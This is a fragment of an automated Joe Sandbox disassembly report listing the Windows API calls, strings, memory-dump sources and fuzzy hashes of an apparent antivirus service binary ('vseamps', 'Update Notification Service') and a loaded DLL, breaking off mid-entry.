                                                                                          • Part of subcall function 0000000140003F80: OpenProcessToken.ADVAPI32 ref: 0000000140004007
                                                                                          • Part of subcall function 0000000140003F80: GetLastError.KERNEL32 ref: 0000000140004011
                                                                                          • Part of subcall function 0000000140003F80: EnterCriticalSection.KERNEL32 ref: 00000001400040B3
                                                                                          • Part of subcall function 0000000140003F80: LeaveCriticalSection.KERNEL32 ref: 000000014000412B
                                                                                          • Part of subcall function 0000000140003F80: GetVersionExW.KERNEL32 ref: 0000000140004155
                                                                                          • Part of subcall function 0000000140003F80: RpcSsDontSerializeContext.RPCRT4 ref: 000000014000416C
                                                                                          • Part of subcall function 0000000140003F80: RpcServerUseProtseqEpW.RPCRT4 ref: 0000000140004189
                                                                                          • Part of subcall function 0000000140003F80: RpcServerRegisterIfEx.RPCRT4 ref: 00000001400041B9
                                                                                          • Part of subcall function 0000000140003F80: RpcServerListen.RPCRT4 ref: 00000001400041D3
                                                                                        • SetServiceStatus.ADVAPI32 ref: 0000000140001302
                                                                                        • WaitForSingleObject.KERNEL32 ref: 0000000140001312
                                                                                          • Part of subcall function 00000001400042B0: EnterCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042BB
                                                                                          • Part of subcall function 00000001400042B0: CancelWaitableTimer.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042C8
                                                                                          • Part of subcall function 00000001400042B0: SetEvent.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042D5
                                                                                          • Part of subcall function 00000001400042B0: WaitForSingleObject.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042E7
                                                                                          • Part of subcall function 00000001400042B0: TerminateThread.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042FD
                                                                                          • Part of subcall function 00000001400042B0: CloseHandle.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000430A
                                                                                          • Part of subcall function 00000001400042B0: CloseHandle.KERNEL32(?,?,?,?,000000014000131D), ref: 0000000140004317
                                                                                          • Part of subcall function 00000001400042B0: CloseHandle.KERNEL32(?,?,?,?,000000014000131D), ref: 0000000140004324
                                                                                          • Part of subcall function 00000001400042B0: RpcServerUnregisterIf.RPCRT4 ref: 0000000140004336
                                                                                          • Part of subcall function 00000001400042B0: RpcMgmtStopServerListening.RPCRT4 ref: 000000014000433E
                                                                                          • Part of subcall function 00000001400042B0: EnterCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000435A
                                                                                          • Part of subcall function 00000001400042B0: LeaveCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000437F
                                                                                          • Part of subcall function 00000001400042B0: DeleteCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000438C
                                                                                          • Part of subcall function 00000001400042B0: #4.VSELOG(?,?,?,?,000000014000131D), ref: 00000001400043C0
                                                                                          • Part of subcall function 00000001400042B0: LeaveCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400043CC
                                                                                          • Part of subcall function 00000001400042B0: DeleteCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400043D9
                                                                                          • Part of subcall function 00000001400042B0: #4.VSELOG(?,?,?,?,000000014000131D), ref: 00000001400043E6
                                                                                        • SetServiceStatus.ADVAPI32 ref: 000000014000134B
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271364265.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271351725.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                                                        • Associated: 00000004.00000002.2271380467.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                                                        • Associated: 00000004.00000002.2271393735.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                                                        • Associated: 00000004.00000002.2271406712.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_140000000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID: CriticalSection$Server$CloseEnterHandleLeaveService$DeleteEventObjectProcessRegisterSingleStatusWait$CancelContextCreateCtrlCurrentDontErrorHandlerInitializeLastListenListeningMgmtOpenProtseqSerializeStopTerminateThreadTimerTokenUnregisterVersionWaitable
                                                                                        • String ID: vseamps
                                                                                        • API String ID: 3197017603-3944098904
                                                                                        • Opcode ID: 4fcaac044f33b8282c396f0e62c58db51f87a82aaa34d44751bf9634b5fd9f61
                                                                                        • Instruction ID: 0252cca9582b7aeb0e5a7a434c8e7364f46e89616d8e728b6478e43ab65cb610
                                                                                        • Opcode Fuzzy Hash: 4fcaac044f33b8282c396f0e62c58db51f87a82aaa34d44751bf9634b5fd9f61
                                                                                        • Instruction Fuzzy Hash: B921A2B1625A009AEB02DF17FC85BD637A0B74C798F45621AB7498F275CB7EC148CB00
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271364265.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271351725.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                                                        • Associated: 00000004.00000002.2271380467.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                                                        • Associated: 00000004.00000002.2271393735.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                                                        • Associated: 00000004.00000002.2271406712.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_140000000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID: Messagesprintf_s
                                                                                        • String ID: 10:52:57$Help$Jul 5 2019$usage: /service - creates the Update Notification Service /remove - removes the Update Notification Service from the sy
                                                                                        • API String ID: 2642950106-3610746849
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271364265.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: Heap$FreeProcess
                                                                                        • String ID:
                                                                                        • API String ID: 3859560861-0
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271364265.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: Heap$FreeProcess
                                                                                        • String ID:
                                                                                        • API String ID: 3859560861-0
                                                                                        APIs
                                                                                        • GetStringTypeW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F6E7
                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F6FD
                                                                                        • GetStringTypeW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F72B
                                                                                        • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F799
                                                                                        • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F84C
                                                                                        • GetStringTypeA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F911
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271364265.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: StringType$ByteCharMultiWide$ErrorLast
                                                                                        • String ID:
                                                                                        • API String ID: 319667368-0
                                                                                        APIs
                                                                                        • GetStringTypeW.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AE38
                                                                                        • GetLastError.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AE4E
                                                                                          • Part of subcall function 00000001400090F0: HeapAlloc.KERNEL32(?,?,00000001,0000000140008328,?,?,00000001,000000014000B350,?,?,?,000000014000B423,?,?,?,000000014000FC9E), ref: 0000000140009151
                                                                                        • MultiByteToWideChar.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AEDE
                                                                                        • MultiByteToWideChar.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AF85
                                                                                        • GetStringTypeW.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AF9C
                                                                                        • GetStringTypeA.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AFFB
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271364265.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: StringType$ByteCharMultiWide$AllocErrorHeapLast
                                                                                        • String ID:
                                                                                        • API String ID: 1390108997-0
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271432825.00007FFE1A511000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A510000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271420314.00007FFE1A510000.00000002.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2271452651.00007FFE1A522000.00000002.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2271467117.00007FFE1A52D000.00000004.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2271479904.00007FFE1A52F000.00000002.00000001.01000000.00000009.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_7ffe1a510000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID: Is_bad_exception_allowedstd::bad_alloc::bad_alloc
                                                                                        • String ID: csm$csm$csm
                                                                                        • API String ID: 3523768491-393685449
                                                                                        APIs
                                                                                        • GetLastError.KERNEL32(?,?,?,00007FFE1A518BC9,?,?,?,?,00007FFE1A518C14), ref: 00007FFE1A5195CB
                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FFE1A518BC9,?,?,?,?,00007FFE1A518C14), ref: 00007FFE1A519601
                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FFE1A518BC9,?,?,?,?,00007FFE1A518C14), ref: 00007FFE1A51962E
                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FFE1A518BC9,?,?,?,?,00007FFE1A518C14), ref: 00007FFE1A51963F
                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FFE1A518BC9,?,?,?,?,00007FFE1A518C14), ref: 00007FFE1A519650
                                                                                        • SetLastError.KERNEL32(?,?,?,00007FFE1A518BC9,?,?,?,?,00007FFE1A518C14), ref: 00007FFE1A51966B
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271432825.00007FFE1A511000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A510000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: Value$ErrorLast
                                                                                        • String ID:
                                                                                        • API String ID: 2506987500-0
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271364265.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: CloseCriticalHandleSection$EnterEventLeaveObjectSingleWait
                                                                                        • String ID:
                                                                                        • API String ID: 3326452711-0
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271364265.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: CriticalSection$EnterLeaveTimerWaitable
                                                                                        • String ID: amps_Exec: pHandle=%p, execId=%d, iParam=%d
                                                                                        • API String ID: 2984211723-1229430080
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271432825.00007FFE1A511000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A510000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                                                        • String ID: CorExitProcess$mscoree.dll
                                                                                        • API String ID: 4061214504-1276376045
                                                                                        APIs
                                                                                        • GetModuleHandleA.KERNEL32(?,?,00000028,0000000140009145,?,?,00000001,0000000140008328,?,?,00000001,000000014000B350,?,?,?,000000014000B423), ref: 000000014000851F
                                                                                        • GetProcAddress.KERNEL32(?,?,00000028,0000000140009145,?,?,00000001,0000000140008328,?,?,00000001,000000014000B350,?,?,?,000000014000B423), ref: 0000000140008534
                                                                                        • ExitProcess.KERNEL32 ref: 0000000140008545
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271364265.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: AddressExitHandleModuleProcProcess
                                                                                        • String ID: CorExitProcess$mscoree.dll
                                                                                        • API String ID: 75539706-1276376045
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271432825.00007FFE1A511000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A510000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: AdjustPointer
                                                                                        • String ID:
                                                                                        • API String ID: 1740715915-0
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271364265.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271351725.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                                                        • Associated: 00000004.00000002.2271380467.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                                                        • Associated: 00000004.00000002.2271393735.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                                                        • Associated: 00000004.00000002.2271406712.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_140000000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileInfoSleepStartupType
                                                                                        • String ID:
                                                                                        • API String ID: 1527402494-0
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271364265.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271351725.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                                                        • Associated: 00000004.00000002.2271380467.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                                                        • Associated: 00000004.00000002.2271393735.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                                                        • Associated: 00000004.00000002.2271406712.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_140000000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID: CommandLine$ByteCharErrorLastMultiWide
                                                                                        • String ID:
                                                                                        • API String ID: 3078728599-0
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271364265.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271351725.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                                                        • Associated: 00000004.00000002.2271380467.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                                                        • Associated: 00000004.00000002.2271393735.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                                                        • Associated: 00000004.00000002.2271406712.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_140000000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID: Console$Write$ByteCharCreateErrorFileLastMultiOutputWide
                                                                                        • String ID:
                                                                                        • API String ID: 1850339568-0
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271432825.00007FFE1A511000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A510000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271420314.00007FFE1A510000.00000002.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2271452651.00007FFE1A522000.00000002.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2271467117.00007FFE1A52D000.00000004.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2271479904.00007FFE1A52F000.00000002.00000001.01000000.00000009.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_7ffe1a510000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID: _set_statfp
                                                                                        • String ID:
                                                                                        • API String ID: 1156100317-0
                                                                                        APIs
                                                                                        • FlsGetValue.KERNEL32(?,?,?,00007FFE1A51766F,?,?,00000000,00007FFE1A51790A,?,?,?,?,?,00007FFE1A517896), ref: 00007FFE1A5196A3
                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FFE1A51766F,?,?,00000000,00007FFE1A51790A,?,?,?,?,?,00007FFE1A517896), ref: 00007FFE1A5196C2
                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FFE1A51766F,?,?,00000000,00007FFE1A51790A,?,?,?,?,?,00007FFE1A517896), ref: 00007FFE1A5196EA
                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FFE1A51766F,?,?,00000000,00007FFE1A51790A,?,?,?,?,?,00007FFE1A517896), ref: 00007FFE1A5196FB
                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FFE1A51766F,?,?,00000000,00007FFE1A51790A,?,?,?,?,?,00007FFE1A517896), ref: 00007FFE1A51970C
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271432825.00007FFE1A511000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A510000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271420314.00007FFE1A510000.00000002.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2271452651.00007FFE1A522000.00000002.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2271467117.00007FFE1A52D000.00000004.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2271479904.00007FFE1A52F000.00000002.00000001.01000000.00000009.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_7ffe1a510000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID: Value
                                                                                        • String ID:
                                                                                        • API String ID: 3702945584-0
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271432825.00007FFE1A511000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A510000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271420314.00007FFE1A510000.00000002.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2271452651.00007FFE1A522000.00000002.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2271467117.00007FFE1A52D000.00000004.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2271479904.00007FFE1A52F000.00000002.00000001.01000000.00000009.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_7ffe1a510000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID: Value
                                                                                        • String ID:
                                                                                        • API String ID: 3702945584-0
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271432825.00007FFE1A511000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A510000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271420314.00007FFE1A510000.00000002.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2271452651.00007FFE1A522000.00000002.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2271467117.00007FFE1A52D000.00000004.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2271479904.00007FFE1A52F000.00000002.00000001.01000000.00000009.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_7ffe1a510000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID: CallEncodePointerTranslator
                                                                                        • String ID: MOC$RCC
                                                                                        • API String ID: 3544855599-2084237596
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271432825.00007FFE1A511000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A510000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271420314.00007FFE1A510000.00000002.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2271452651.00007FFE1A522000.00000002.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2271467117.00007FFE1A52D000.00000004.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2271479904.00007FFE1A52F000.00000002.00000001.01000000.00000009.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_7ffe1a510000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                        • String ID: csm
                                                                                        • API String ID: 2395640692-1018135373
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271432825.00007FFE1A511000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A510000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271420314.00007FFE1A510000.00000002.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2271452651.00007FFE1A522000.00000002.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2271467117.00007FFE1A52D000.00000004.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2271479904.00007FFE1A52F000.00000002.00000001.01000000.00000009.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_7ffe1a510000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                        • String ID: csm$csm
                                                                                        • API String ID: 3896166516-3733052814
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271432825.00007FFE1A511000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A510000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271420314.00007FFE1A510000.00000002.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2271452651.00007FFE1A522000.00000002.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2271467117.00007FFE1A52D000.00000004.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2271479904.00007FFE1A52F000.00000002.00000001.01000000.00000009.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_7ffe1a510000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID: CallEncodePointerTranslator
                                                                                        • String ID: MOC$RCC
                                                                                        • API String ID: 3544855599-2084237596
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271364265.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271351725.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                                                        • Associated: 00000004.00000002.2271380467.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                                                        • Associated: 00000004.00000002.2271393735.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                                                        • Associated: 00000004.00000002.2271406712.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_140000000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressHandleLoadModuleProc
                                                                                        • String ID: InitializeCriticalSectionAndSpinCount$kernel32.dll
                                                                                        • API String ID: 3055805555-3733552308
                                                                                        • Opcode ID: 8c1e87d42adfe8e60614ff850b90a208d486e410194b6671aa5990fefe8541df
                                                                                        • Instruction ID: 601bfb796087d826a15eddab62e6da73c6b3e4e45b37998f9684764b2688f2d2
                                                                                        • Opcode Fuzzy Hash: 8c1e87d42adfe8e60614ff850b90a208d486e410194b6671aa5990fefe8541df
                                                                                        • Instruction Fuzzy Hash: 5C2136B1614B8582EB66DB23F8407DAA3A5B79C7C0F880526BB49577B5EF78C500C700
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271364265.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271351725.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                                                        • Associated: 00000004.00000002.2271380467.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                                                        • Associated: 00000004.00000002.2271393735.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                                                        • Associated: 00000004.00000002.2271406712.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_140000000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID: Process$CurrentSizeWorking
                                                                                        • String ID: Shrinking process size
                                                                                        • API String ID: 2122760700-652428428
                                                                                        • Opcode ID: 928bd44cec0a58dd036a38053952d90c466f8539e57cdcef56d3cedc878990dc
                                                                                        • Instruction ID: de407452bcc55573093b25e37d4a5c8190b9a80636e05c4b95c6e58ff86151e7
                                                                                        • Opcode Fuzzy Hash: 928bd44cec0a58dd036a38053952d90c466f8539e57cdcef56d3cedc878990dc
                                                                                        • Instruction Fuzzy Hash: 74E0C9B4601A4191EA029F57A8A03D41260A74CBF0F815721AA290B2F0CE3985858310
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271364265.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271351725.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                                                        • Associated: 00000004.00000002.2271380467.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                                                        • Associated: 00000004.00000002.2271393735.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                                                        • Associated: 00000004.00000002.2271406712.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_140000000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID: CriticalSection$Enter$Leave
                                                                                        • String ID:
                                                                                        • API String ID: 2801635615-0
                                                                                        • Opcode ID: 5d43bde81a4cf71b6d13cac54dc418821bc3305084b6f84d33dc9cdc1ff96344
                                                                                        • Instruction ID: acd2e58e1a3fd81a861280768b65888603737fa84cc19007189881c9ae716cb0
                                                                                        • Opcode Fuzzy Hash: 5d43bde81a4cf71b6d13cac54dc418821bc3305084b6f84d33dc9cdc1ff96344
                                                                                        • Instruction Fuzzy Hash: D331137A225A4082EB128F1AF8407D57364F79DBF5F480221FF6A4B7B4DB3AC8858744
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271432825.00007FFE1A511000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A510000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271420314.00007FFE1A510000.00000002.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2271452651.00007FFE1A522000.00000002.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2271467117.00007FFE1A52D000.00000004.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2271479904.00007FFE1A52F000.00000002.00000001.01000000.00000009.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_7ffe1a510000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                        • String ID:
                                                                                        • API String ID: 2718003287-0
                                                                                        • Opcode ID: 0c7799b21e1c94aa1fd225f6b85a6c051f6d6fdfc663a61abe1d9cd11d154d48
                                                                                        • Instruction ID: c3bdf5fc096c64068d07cd8c26a0ffa865e01ceaee71b160340412b538af1c01
                                                                                        • Opcode Fuzzy Hash: 0c7799b21e1c94aa1fd225f6b85a6c051f6d6fdfc663a61abe1d9cd11d154d48
                                                                                        • Instruction Fuzzy Hash: DDD1D072B0CA8199E711CF66D4402FC37B2FB45BA8B4442B6DE9D97BA9DE38D446C340
                                                                                        APIs
                                                                                        • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00007FFE1A51ED07), ref: 00007FFE1A51EE38
                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00007FFE1A51ED07), ref: 00007FFE1A51EEC3
                                                                                        Memory Dump Source
